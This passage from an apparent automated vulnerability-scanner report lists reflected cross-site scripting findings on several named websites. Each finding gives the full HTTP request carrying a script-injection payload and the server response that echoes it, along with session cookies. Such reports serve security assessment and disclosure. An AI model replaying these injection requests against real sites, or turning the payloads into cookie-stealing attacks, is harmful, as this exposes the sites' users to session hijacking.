Cookie: uu=dacf7498-51d7-4f6e-bb25-12ebd1f1b26e; referrer=5031%3A%3A%3A%3A%3A%3A1324861527%3A%3A%3A%3A%3A%3Abbs_farecast_flights_HP_unchecked-box-a_001; ssource=%7B%22id%22%3A5031%2C%22unique_name%22%3A%22bbs_farecast_flights_HP_unchecked-box-a_001%22%2C%22type%22%3A%22traq%22%2C%22marketing_partner%22%3A%22bing_travel_farecast%22%7D; cstream=mcid%3A%3A13285%7C%7C%7Cttl%3A%3A1325466327; pb_bb_ab_bbs_2618=c0f0bfe4d5e58f8777d154e6095d14c6a%3A1%3A%7Bs%3A14%3A%22bb_ab_bbs_2618%22%3Bs%3A12%3A%22bbs_2618_new%22%3B%7D; BBP_Ads=%7B%22pop%22%3Anull%2C%22tab%22%3A%5B%5D%7D; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22WAS%22%2C%22c2%22%3A%22SEA%22%2C%22st%22%3A%22roundtrip%22%2C%22ntrv%22%3A%221%22%2C%22d1%22%3A1327039200000%2C%22d2%22%3A1327212000000%2C%22ns%22%3A%22%22%2C%22t1%22%3A%22anytime%22%2C%22t2%22%3A%22anytime%22%2C%22sc%22%3A%22economy_coach%22%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%2C%22holiday%22%3A%5B%5D%7D%7D; criteo_data=01/20/201201/22/2012WASSEA5031; entry_time=time; last_visited=1324861550908; last_visited_sent=1; vss_mode=["air"]; s_cc=true; e_Var22=eVar22; s_p1_s_campaign=5031; s_p1_s_eVar7=5031; s_p1_s_eVar9=5031; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|277BE42F05162E54-600001988036EB7C[CE]; vid=4ef7c8603bb049.25542662
Content-Length: 10

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Date: Mon, 26 Dec 2011 01:06:40 GMT
Content-Length: 1975
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
nited_states;owr=north_america;ost=washington;u=|||air|north_america|united_states|washington|seattle|north_america|united_states|washington|seattle|;dcopt=ist;sz=300x250,250x250;tile=1;ord=1201616322;b4f62';alert(1)//5efa129e83" type="text/javascript">
...[SNIP]...

1.23. http://www.mongoosemetrics.com/correlation/json_find_correlation_number.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mongoosemetrics.com
Path:	/correlation/json_find_correlation_number.php

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload a3d98--><script>alert(1)</script>a15b4a9f79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /correlationa3d98--><script>alert(1)</script>a15b4a9f79/json_find_correlation_number.php?keyword=undefined&source=&adcampaign=&callback=visitorID&fullquery=&GUID=0273cfdf-e34c-8eb1-96bc-604d0029933b&UUID=ED5C3DC3-7CA4-4A72-8978-681B84D4B07A&SUID=065772CA-47EF-4C9D-8B58-AE33E9DDCD1D&campaign=10090c2589dd2a68d832b8cddd72b1c7&ref=&q=&or=&jsonp=mm_nHZrVnhnlJCkhJHwCLgH HTTP/1.1
Host: www.mongoosemetrics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.champlain.edu/
Cookie: SERVERID=www1
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Mon, 26 Dec 2011 01:45:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 41745
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="eng" lang="eng"><script>alert(1)</script>a15b4a9f79/json_find_correlation_number.php?keyword=undefined&source=&adcampaign=&callback=visitorID&fullquery=&GUID=0273cfdf-e34c-8eb1-96bc-604d0029933b&UUID=ED5C3DC3-7CA4-4A72-8978-681B84D4B07A&SUID=065772CA-4
...[SNIP]...

1.24. http://www.mongoosemetrics.com/correlation/json_find_correlation_number.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mongoosemetrics.com
Path:	/correlation/json_find_correlation_number.php

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload cc84f--><script>alert(1)</script>9b8baf58e0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /correlation/json_find_correlation_number.phpcc84f--><script>alert(1)</script>9b8baf58e0e?keyword=undefined&source=&adcampaign=&callback=visitorID&fullquery=&GUID=0273cfdf-e34c-8eb1-96bc-604d0029933b&UUID=ED5C3DC3-7CA4-4A72-8978-681B84D4B07A&SUID=065772CA-47EF-4C9D-8B58-AE33E9DDCD1D&campaign=10090c2589dd2a68d832b8cddd72b1c7&ref=&q=&or=&jsonp=mm_nHZrVnhnlJCkhJHwCLgH HTTP/1.1
Host: www.mongoosemetrics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.champlain.edu/
Cookie: SERVERID=www1
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Mon, 26 Dec 2011 01:45:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 41746
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="eng" lang="eng"><script>alert(1)</script>9b8baf58e0e?keyword=undefined&source=&adcampaign=&callback=visitorID&fullquery=&GUID=0273cfdf-e34c-8eb1-96bc-604d0029933b&UUID=ED5C3DC3-7CA4-4A72-8978-681B84D4B07A&SUID=065772CA-47EF-4C9D-8B58-AE33E9DDCD1D&campai
...[SNIP]...

1.25. http://www.mongoosemetrics.com/correlation/json_find_correlation_number.php [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mongoosemetrics.com
Path:	/correlation/json_find_correlation_number.php

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 15027%3balert(1)//b7bd11dc53f was submitted in the callback parameter. This input was echoed as 15027;alert(1)//b7bd11dc53f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /correlation/json_find_correlation_number.php?keyword=undefined&source=&adcampaign=&callback=visitorID15027%3balert(1)//b7bd11dc53f&fullquery=&GUID=0273cfdf-e34c-8eb1-96bc-604d0029933b&UUID=ED5C3DC3-7CA4-4A72-8978-681B84D4B07A&SUID=065772CA-47EF-4C9D-8B58-AE33E9DDCD1D&campaign=10090c2589dd2a68d832b8cddd72b1c7&ref=&q=&or=&jsonp=mm_nHZrVnhnlJCkhJHwCLgH HTTP/1.1
Host: www.mongoosemetrics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.champlain.edu/
Cookie: SERVERID=www1
Content-Length: 10

Response

HTTP/1.1 200 OK
Date: Mon, 26 Dec 2011 01:45:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 180
Connection: close
Content-Type: application/javascript

visitorID15027;alert(1)//b7bd11dc53f({"corelate_number":-2,"interval":"720","unique_cookie":"d41d8cd98f00b204e9800998ecf8427e","promo_code":null,"master":"","SUID":1,"search":""});

1.26. http://www.mongoosemetrics.com/jsfiles/js-correlation/mm-control.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mongoosemetrics.com
Path:	/jsfiles/js-correlation/mm-control.php

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 31c7a--><script>alert(1)</script>d26780d64ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jsfiles31c7a--><script>alert(1)</script>d26780d64ec/js-correlation/mm-control.php?undefined&mm_campaign=10090c2589dd2a68d832b8cddd72b1c7&mm_num=null&mm_chk_id=1324863808&mm_is_organic=0&mm_get_uuid=null HTTP/1.1
Host: www.mongoosemetrics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.champlain.edu/
Cookie: SERVERID=www1
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Mon, 26 Dec 2011 01:44:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 41582
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="eng" lang="eng"><script>alert(1)</script>d26780d64ec/js-correlation/mm-control.php?undefined&mm_campaign=10090c2589dd2a68d832b8cddd72b1c7&mm_num=null&mm_chk_id=1324863808&mm_is_organic=0&mm_get_uuid=null" />
...[SNIP]...

1.27. http://www.mongoosemetrics.com/jsfiles/js-correlation/mm-control.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mongoosemetrics.com
Path:	/jsfiles/js-correlation/mm-control.php

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload c9655--><script>alert(1)</script>dd3ee735d36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jsfiles/js-correlationc9655--><script>alert(1)</script>dd3ee735d36/mm-control.php?undefined&mm_campaign=10090c2589dd2a68d832b8cddd72b1c7&mm_num=null&mm_chk_id=1324863808&mm_is_organic=0&mm_get_uuid=null HTTP/1.1
Host: www.mongoosemetrics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.champlain.edu/
Cookie: SERVERID=www1
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Mon, 26 Dec 2011 01:44:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 41582
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="eng" lang="eng"><script>alert(1)</script>dd3ee735d36/mm-control.php?undefined&mm_campaign=10090c2589dd2a68d832b8cddd72b1c7&mm_num=null&mm_chk_id=1324863808&mm_is_organic=0&mm_get_uuid=null" />
...[SNIP]...

1.28. http://www.mongoosemetrics.com/jsfiles/js-correlation/mm-control.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mongoosemetrics.com
Path:	/jsfiles/js-correlation/mm-control.php

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 1a0ac--><script>alert(1)</script>0b6b35067eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jsfiles/js-correlation/mm-control.php1a0ac--><script>alert(1)</script>0b6b35067eb?undefined&mm_campaign=10090c2589dd2a68d832b8cddd72b1c7&mm_num=null&mm_chk_id=1324863808&mm_is_organic=0&mm_get_uuid=null HTTP/1.1
Host: www.mongoosemetrics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.champlain.edu/
Cookie: SERVERID=www1
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Mon, 26 Dec 2011 01:44:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 41582
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="eng" lang="eng"><script>alert(1)</script>0b6b35067eb?undefined&mm_campaign=10090c2589dd2a68d832b8cddd72b1c7&mm_num=null&mm_chk_id=1324863808&mm_is_organic=0&mm_get_uuid=null" />
...[SNIP]...

1.29. http://www.mongoosemetrics.com/jsfiles/js-correlation/mm-getvar.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mongoosemetrics.com
Path:	/jsfiles/js-correlation/mm-getvar.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 98872--><script>alert(1)</script>6d84aff502e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jsfiles98872--><script>alert(1)</script>6d84aff502e/js-correlation/mm-getvar.js HTTP/1.1
Host: www.mongoosemetrics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.champlain.edu/
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Mon, 26 Dec 2011 01:44:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 41459
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: SERVERID=www1; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="eng" lang="eng"><script>alert(1)</script>6d84aff502e/js-correlation/mm-getvar.js" />
...[SNIP]...

1.30. http://www.mongoosemetrics.com/jsfiles/js-correlation/mm-getvar.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mongoosemetrics.com
Path:	/jsfiles/js-correlation/mm-getvar.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 721a5--><script>alert(1)</script>7a22260eb76 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jsfiles/js-correlation721a5--><script>alert(1)</script>7a22260eb76/mm-getvar.js HTTP/1.1
Host: www.mongoosemetrics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.champlain.edu/
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Mon, 26 Dec 2011 01:44:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 41459
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: SERVERID=www1; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="eng" lang="eng"><script>alert(1)</script>7a22260eb76/mm-getvar.js" />
...[SNIP]...

1.31. http://www.mongoosemetrics.com/jsfiles/js-correlation/mm-getvar.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mongoosemetrics.com
Path:	/jsfiles/js-correlation/mm-getvar.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 3abab--><script>alert(1)</script>ab9ee318ef8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jsfiles/js-correlation/mm-getvar.js3abab--><script>alert(1)</script>ab9ee318ef8 HTTP/1.1
Host: www.mongoosemetrics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.champlain.edu/
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Mon, 26 Dec 2011 01:44:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 41459
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: SERVERID=www1; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="eng" lang="eng"><script>alert(1)</script>ab9ee318ef8" />
...[SNIP]...

1.32. http://www.weseed.com/images/backgrounds/blank.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weseed.com
Path:	/images/backgrounds/blank.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc95b"><script>alert(1)</script>538949ae1fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagescc95b"><script>alert(1)</script>538949ae1fd/backgrounds/blank.gif HTTP/1.1
Host: www.weseed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.weseed.com/
Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Jan 2012 15:53:32 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f; path=/; HttpOnly
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
Content-Length: 10767
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.weseed.com/imagescc95b"><script>alert(1)</script>538949ae1fd/backgrounds/blank.gif" />
...[SNIP]...

1.33. http://www.weseed.com/images/backgrounds/blank.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weseed.com
Path:	/images/backgrounds/blank.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5d37"><script>alert(1)</script>646dc6198dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/backgroundse5d37"><script>alert(1)</script>646dc6198dc/blank.gif HTTP/1.1
Host: www.weseed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.weseed.com/
Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Jan 2012 15:53:32 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f; path=/; HttpOnly
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
Content-Length: 10767
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.weseed.com/images/backgroundse5d37"><script>alert(1)</script>646dc6198dc/blank.gif" />
...[SNIP]...

1.34. http://www.weseed.com/images/backgrounds/blank.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weseed.com
Path:	/images/backgrounds/blank.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aa86"><script>alert(1)</script>ffde9a447d0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/backgrounds/blank.gif7aa86"><script>alert(1)</script>ffde9a447d0 HTTP/1.1
Host: www.weseed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.weseed.com/
Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Jan 2012 15:53:32 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f; path=/; HttpOnly
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
Content-Length: 10767
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.weseed.com/images/backgrounds/blank.gif7aa86"><script>alert(1)</script>ffde9a447d0" />
...[SNIP]...

1.35. http://www.weseed.com/images/backgrounds/headerBanner_new_user_home.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weseed.com
Path:	/images/backgrounds/headerBanner_new_user_home.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6581"><script>alert(1)</script>8bdbf5405c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagesc6581"><script>alert(1)</script>8bdbf5405c/backgrounds/headerBanner_new_user_home.png HTTP/1.1
Host: www.weseed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.weseed.com/
Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Jan 2012 15:53:32 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f; path=/; HttpOnly
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
Content-Length: 10807
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.weseed.com/imagesc6581"><script>alert(1)</script>8bdbf5405c/backgrounds/headerBanner_new_user_home.png" />
...[SNIP]...

1.36. http://www.weseed.com/images/backgrounds/headerBanner_new_user_home.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weseed.com
Path:	/images/backgrounds/headerBanner_new_user_home.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffa09"><script>alert(1)</script>3b65e62e778 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/backgroundsffa09"><script>alert(1)</script>3b65e62e778/headerBanner_new_user_home.png HTTP/1.1
Host: www.weseed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.weseed.com/
